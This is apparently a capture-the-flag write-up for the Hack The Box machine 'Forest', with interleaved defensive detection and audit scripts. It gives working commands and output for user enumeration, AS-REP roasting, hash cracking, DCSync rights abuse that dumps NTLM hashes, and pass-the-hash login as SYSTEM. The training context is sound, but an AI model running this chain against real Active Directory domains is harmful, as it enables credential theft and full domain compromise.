# HTB - Forest

## Enumeration

***

**Scope**

> IP Address: 10.10.10.161

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ nmap -p- --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
5985/tcp open   wsman

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-08 11:55:21Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-07-08T04:55:24-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m49s
| smb2-time: 
|   date: 2024-07-08T11:55:26
|_  start_date: 2024-07-08T11:39:10
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
```

```
* Open ports: 88 - 135 - 139 - 389 - 445 - 5985
* UDP Open ports: 88 - 123 - 389
* Services:
* Versions:
* Important Notes:Domain: htb.local - Windows Server 2016 Standard 14393 - FQDN: FOREST.htb.local
```

**Enumeration**

**SMB**

SMB enumeration didn't give any useful information.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ smbclient -N -L //$ip                                                                                                           
Anonymous login successful                                                                                                          
        Sharename       Type      Comment
        ---------       ----      -------                                                                                           
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                             
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                                                                                      
SMB         10.10.10.161    445    FOREST           [+] htb.local\:
SMB         10.10.10.161    445    FOREST           [-] Error enumerating shares: STATUS_ACCESS_DENIED 
```

**RPC**

I managed to enumerate the domain users with `rpcclient`

```bash
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
```

I have to create a user list and attempt further enumeration.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ cat user | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi
```

## Initial Access

***

Trying the wordlist we got from RPC enumeration against Kerberos.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ kerbrute userenum --dc $ip -d htb.local -t 100 -o kerbrute.list ./users.lst

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/08/24 - Ronnie Flathers @ropnop

2024/07/08 07:57:51 >  Using KDC(s):
2024/07/08 07:57:51 >   10.10.10.161:88

2024/07/08 07:57:51 >  [+] VALID USERNAME:       Administrator@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxc3d7722@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxc0a90c9@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxfc9daad@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox670628e@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxfd87238@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox83d6781@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxb01ac64@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox6ded678@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox968e74d@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox7108a4e@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       lucinda@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox0659cc1@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       sebastien@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       santi@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       andy@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       mark@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       svc-alfresco@htb.local

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ cat kerbrute.list | awk '{print $7}' | cut -d@ -f1 | tee -a final.lst

Administrator
HealthMailboxc3d7722
HealthMailboxc0a90c9
HealthMailboxfc9daad
HealthMailbox670628e
HealthMailboxfd87238
HealthMailbox83d6781
HealthMailboxb01ac64
HealthMailbox6ded678
HealthMailbox968e74d
HealthMailbox7108a4e
lucinda
HealthMailbox0659cc1
sebastien
santi
andy
mark
svc-alfresco
```

The next step in my mind is to attempt `ASREP-Roasting` against the users we found.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-GetNPUsers htb.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile final.lst 

<snip>
$krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8
```
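
On the defender's side, a request like the one above shows up on the domain controller as a successful Event ID 4768 with pre-authentication type 0. The following is an added example, not part of the original write-up: it filters such records out of a constructed sample of 4768 events and also reports sources that asked for tickets for many different account names. The `ghost*` usernames, the `10.10.10.50` workstation and all function names are assumptions made for illustration.

```python
from collections import defaultdict

# Kerberos etypes treated as weak here; 0x17 is RC4-HMAC, the "23" in "$krb5asrep$23$".
WEAK_ETYPES = {"0x1": "DES-CBC-CRC", "0x3": "DES-CBC-MD5",
               "0x17": "RC4-HMAC", "0x18": "RC4-HMAC-EXP"}


def source_ip(event):
    """Strip the IPv4-mapped IPv6 prefix that 4768 records carry."""
    ip = event["IpAddress"]
    return ip[7:] if ip.startswith("::ffff:") else ip


def preauthless_tgts(events):
    """Successful TGT requests (4768) that were answered without pre-authentication."""
    findings = []
    for ev in events:
        if ev["EventID"] != 4768 or ev["Status"] != "0x0" or ev["PreAuthType"] != "0":
            continue
        etype = ev["TicketEncryptionType"]
        findings.append({
            "user": ev["TargetUserName"],
            "source": source_ip(ev),
            "etype": WEAK_ETYPES.get(etype, etype),
            "weak_etype": etype in WEAK_ETYPES,
        })
    return findings


def tgt_fanout(events, threshold=5):
    """Sources that requested TGTs for at least `threshold` distinct account names."""
    names = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 4768:
            names[source_ip(ev)].add(ev["TargetUserName"].lower())
    return {ip: len(users) for ip, users in names.items() if len(users) >= threshold}


def make_event(user, ip, status, preauth, etype):
    """Build one constructed 4768 record with the EventData fields used above."""
    return {"EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample: five lookups of unknown names (status 0x6), one TGT issued
# without pre-authentication, and two ordinary logons with pre-authentication.
SAMPLE_EVENTS = [
    make_event(f"ghost{i}", "::ffff:10.10.16.3", "0x6", "-", "0xffffffff") for i in range(5)
] + [
    make_event("svc-alfresco", "::ffff:10.10.16.3", "0x0", "0", "0x17"),
    make_event("lucinda", "::ffff:10.10.10.50", "0x0", "2", "0x12"),
    make_event("FOREST$", "::1", "0x0", "2", "0x12"),
]

if __name__ == "__main__":
    for finding in preauthless_tgts(SAMPLE_EVENTS):
        print("no-preauth TGT:", finding)
    print("high fan-out sources:", tgt_fanout(SAMPLE_EVENTS))
```

The lasting fix is to clear "Do not require Kerberos preauthentication" (the `DONT_REQ_PREAUTH` bit, `0x400000`, in `userAccountControl`) on the account and to give service accounts long random passwords.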

I will then fire up hashcat and try to crack this hash

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt 

$krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8f:s3rvice

Session..........: hashcat
Status...........: Cracked
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ evil-winrm -i $ip -u svc-alfresco -p 's3rvice'

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
```

```bash
*Evil-WinRM* PS C:\Users\svc-alfresco> type Desktop\user.txt
c547a655316215e19xxxxxxxxxxxxxxxx
```

> User Flag: c547a655316215e19xxxxxxxxxxxxxxxx

***

## Privilege Escalation

In Active Directory enumeration, I'm used to running `bloodhound.py` as soon as I obtain valid credentials, but this time it failed, so I uploaded `SharpHound.exe` to the machine instead.

```PowerShell
*Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe -c All --zipfilename forest

<snip>
2024-07-08T05:22:16.0093511-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 51 MB RAM
2024-07-08T05:22:16.0093511-07:00|INFORMATION|Enumeration finished in 00:00:44.7988005
2024-07-08T05:22:16.1343445-07:00|INFORMATION|SharpHound Enumeration Completed at 5:22 AM on 7/8/2024! Happy Graphing!
```

I will then start an SMB server and move the generated `zip` file to my attack host to upload it to the BloodHound GUI.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-smbserver -smb2support share . -username blind0bandit -password blind0bandit
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

Authenticate the Windows box to my Kali machine and then move the file.

```PowerShell
*Evil-WinRM* PS C:\Users\svc-alfresco> net use n: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> move 20240708052215_forest.zip n:
```

First, I searched for the `svc-alfresco` account and clicked on `Reachable High Value Targets`, as its value caught my attention.


`svc-alfresco` is a member of `Service accounts` which is a member of `PRIVILEGED IT ACCOUNTS` which is a member of `ACCOUNT OPERATORS`. It's a nested group membership :)


So, I can say that `svc-alfresco` is a member of the `Account Operators` group, which is a highly privileged group.

* Further enumeration of the `Account Operators` group in BloodHound showed that it has `GenericAll` on `EXCHANGE WINDOWS PERMISSIONS`, and that group has `WriteDacl` on the domain.
  * `GenericAll`: It means I have full control of the object; in our situation, it can be abused by adding ourselves to that group.
  * `WriteDacl`: It means that I can modify the object's discretionary access control list (`DACL`); in our situation, it can be abused by granting ourselves `DCSync` rights so we can dump the `ntds` database and get the administrator's hash.
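
The chain described above can be audited as a graph search. This is an added example, not code from the original write-up or from BloodHound: it encodes the memberships and ACL edges named on this page and returns the hop-by-hop path from a principal to control of the domain's DACL. The `lucinda` entry is a constructed contrast case and the function and variable names are assumptions.

```python
from collections import deque

# Rights that let the holder join a group, or rewrite the domain object's DACL.
GROUP_TAKEOVER = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "AddMember"}
DOMAIN_TAKEOVER = {"GenericAll", "WriteDacl", "WriteOwner"}

# Edges as reported on this page; "lucinda" is a constructed contrast case.
MEMBER_OF = {
    "svc-alfresco": ["Domain Users", "Service Accounts"],
    "Service Accounts": ["Privileged IT Accounts"],
    "Privileged IT Accounts": ["Account Operators"],
    "lucinda": ["Domain Users"],
}
# Control edges: holder -> [(right, target)]; non-domain targets are assumed to be groups.
CONTROLS = {
    "Account Operators": [("GenericAll", "Exchange Windows Permissions")],
    "Exchange Windows Permissions": [("WriteDacl", "htb.local")],
}


def path_to_domain_dacl(principal, member_of, controls, domain="htb.local"):
    """Breadth-first search; returns the shortest list of (source, edge, target) hops, or None."""
    queue, seen = deque([(principal, [])]), {principal}
    while queue:
        node, path = queue.popleft()
        hops = [("MemberOf", g) for g in member_of.get(node, [])] + controls.get(node, [])
        for edge, target in hops:
            step = path + [(node, edge, target)]
            if target == domain:
                if edge in DOMAIN_TAKEOVER:
                    return step
                continue
            # Membership is inherited; a takeover right over a group is as good as membership.
            usable = edge == "MemberOf" or edge in GROUP_TAKEOVER
            if usable and target not in seen:
                seen.add(target)
                queue.append((target, step))
    return None


if __name__ == "__main__":
    for user in ("svc-alfresco", "lucinda"):
        print(user, "->", path_to_domain_dacl(user, MEMBER_OF, CONTROLS))
    # Remediation check: un-nesting the service-account group from Account Operators.
    hardened = dict(MEMBER_OF, **{"Privileged IT Accounts": []})
    print("after un-nesting ->", path_to_domain_dacl("svc-alfresco", hardened, CONTROLS))
```

Re-running the search after a proposed change, such as removing the nesting into `Account Operators` or the `WriteDacl` ACE on the domain, shows whether the path is actually closed.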


We can use `PowerView.ps1` to abuse `GenericAll` & `WriteDacl`, but I will use it only for `GenericAll` and use the `DCSync` tool developed by `n00py` to make the attack easier.

<https://github.com/n00py/DCSync>

> The main reason I didn't use `PowerView` to modify the `DACL` is that I struggled with this machine before: there is a script that resets everything to default settings, and even if you're fast, you might fail.

Clone the repository from GitHub to the `/opt` directory.

```bash
┌──(kali㉿kali)-[/opt]
└─$ sudo git clone https://github.com/n00py/DCSync.git  
```

Use the `net` command to see the current group membership.

```PowerShell
*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco

<snip>
Global Group memberships     *Domain Users         *Service Accounts
```

Execute the following commands to add ourselves to the `EXCHANGE WINDOWS PERMISSIONS` group.

```PowerShell
*Evil-WinRM* PS C:\Users\svc-alfresco> upload PowerView.ps1

import-module .\PowerView.ps1
$pass = ConvertTo-SecureString -Force -AsPlainText 's3rvice'
$cred = New-Object System.Management.Automation.PSCredential("htb.local\svc-alfresco", $pass)
Add-DomainGroupMember -Identity 'EXCHANGE WINDOWS PERMISSIONS' -Members 'svc-alfresco' -Credential $cred
```

Verify

```PowerShell
*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco

<snip>
Global Group memberships     *Exchange Windows Perm*Domain Users
                             *Service Accounts
The command completed successfully.
```

* `DCSync.py` needs some options that we need to get
  * FQDN
  * distinguishedname

We got the `FQDN` from the earlier Nmap script scan => `Forest.htb.local`

And for `distinguishedname`, we can get it using PowerView

```PowerShell
*Evil-WinRM* PS C:\Users\svc-alfresco> Get-DomainUser -Identity svc-alfresco | select-Object -Property distinguishedname

distinguishedname
-----------------
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
```

Now, we're ready to start the attack.

I run the tool and fire up `crackmapexec` in a one-liner because there is a script that will reset the settings, as I said before.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ python3 /opt/DCSync/DCSync.py -dc forest.htb.local -t "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local"  htb.local\\svc-alfresco:'s3rvice'; crackmapexec smb $ip -u svc-alfresco -p 's3rvice' --ntds

[*] Starting DCSync Attack against CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
[*] Initializing LDAP connection to forest.htb.local
[*] Using htb.local\svc-alfresco account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Querying domain security descriptor
[*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20240708-102656.restore
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.10.10.161    445    FOREST           [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         10.10.10.161    445    FOREST           [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.161    445    FOREST           htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb4xxxxxxxxxxxxxx:::
SMB         10.10.10.161    445    FOREST           Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
SMB         10.10.10.161    445    FOREST           DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
SMB         10.10.10.161    445    FOREST           htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
SMB         10.10.10.161    445    FOREST           htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
SMB         10.10.10.161    445    FOREST           htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
SMB         10.10.10.161    445    FOREST           htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
SMB         10.10.10.161    445    FOREST           htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
SMB         10.10.10.161    445    FOREST           htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
SMB         10.10.10.161    445    FOREST           FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:16b31bf83c954c24b824a6c34b81f5eb:::
SMB         10.10.10.161    445    FOREST           EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
```
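
The rights change reported in the output above is visible in the domain object's security descriptor, which makes it auditable. This is an added example, not part of the original write-up or of the DCSync tool: it parses an SDDL string and lists trustees outside an expected baseline that hold both replication extended rights. The domain SID is a constructed placeholder, RID 1121 is invented, the baseline set is an assumption to tune per environment, and conditional ACEs are not handled.

```python
import re

# Extended-right GUIDs that directory replication (and therefore DCSync) depends on.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Assumption: trustees expected to hold replication rights, as SDDL aliases
# (Administrators, Domain Controllers, Enterprise DCs, RODCs, DA, EA, SYSTEM).
EXPECTED = {"BA", "DD", "ED", "RO", "DA", "EA", "SY"}
CONTROL_ACCESS, GENERIC_ALL = 0x100, 0x10000000


def grants_control_access(rights):
    """True if an ACE rights field (hex mask or two-letter codes) includes CR or GA."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & (CONTROL_ACCESS | GENERIC_ALL))
    return bool({rights[i:i + 2] for i in range(0, len(rights), 2)} & {"CR", "GA"})


def replication_trustees(sddl):
    """Map each trustee to the replication rights its allow ACEs grant on the object."""
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))*)", sddl)
    found = {}
    for ace in re.findall(r"\(([^()]*)\)", dacl.group(1) if dacl else ""):
        parts = ace.split(";")
        if len(parts) < 6:
            continue
        ace_type, flags, rights, obj_guid, _, trustee = parts[:6]
        inherit_only = "IO" in {flags[i:i + 2] for i in range(0, len(flags), 2)}
        if ace_type not in ("A", "OA") or inherit_only or not grants_control_access(rights):
            continue
        if not obj_guid:                        # no object GUID: every extended right
            granted = set(REPL_RIGHTS.values())
        elif obj_guid.lower() in REPL_RIGHTS:
            granted = {REPL_RIGHTS[obj_guid.lower()]}
        else:
            continue
        found.setdefault(trustee, set()).update(granted)
    return found


def unexpected_dcsync(sddl):
    """Trustees outside the baseline that hold both replication rights."""
    return sorted(t for t, r in replication_trustees(sddl).items()
                  if len(r) == len(REPL_RIGHTS) and t not in EXPECTED)


# Constructed sample data: placeholder domain SID; 1147 is svc-alfresco's RID on this page.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
GC, GCA = list(REPL_RIGHTS)
BASELINE = (
    "O:BAG:BAD:AI"
    f"(OA;;CR;{GC};;ED)(OA;;CR;{GC};;BA)(OA;;CR;{GCA};;BA)(OA;;CR;{GCA};;DD)"
    "(A;;RPLCLORC;;;AU)(A;CI;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    f"(A;CI;WD;;;{DOMAIN_SID}-1121)"            # WriteDacl only: no replication right
)
AFTER_GRANT = BASELINE + f"(OA;;CR;{GC};;{DOMAIN_SID}-1147)(OA;;CR;{GCA};;{DOMAIN_SID}-1147)"

if __name__ == "__main__":
    print("baseline   :", unexpected_dcsync(BASELINE))
    print("after grant:", unexpected_dcsync(AFTER_GRANT))
```

Run on a schedule against the domain head's current SDDL, a non-empty result means a principal outside the baseline can replicate directory secrets and its ACEs should be reviewed and removed.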

Access the machine as `SYSTEM`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-psexec htb.local/administrator@$ip -hashes :32693b11e6aa90eb4xxxxxxxxxxxxxx
<snip>
C:\Windows\system32> 
```

And finally get the root flag :)

```bash
C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt
689637a422c46e0e07xxxxxxxxxxxxxxxxxxx
```

> Root Flag: 689637a422c46e0e07xxxxxxxxxxxxxxxxxxx


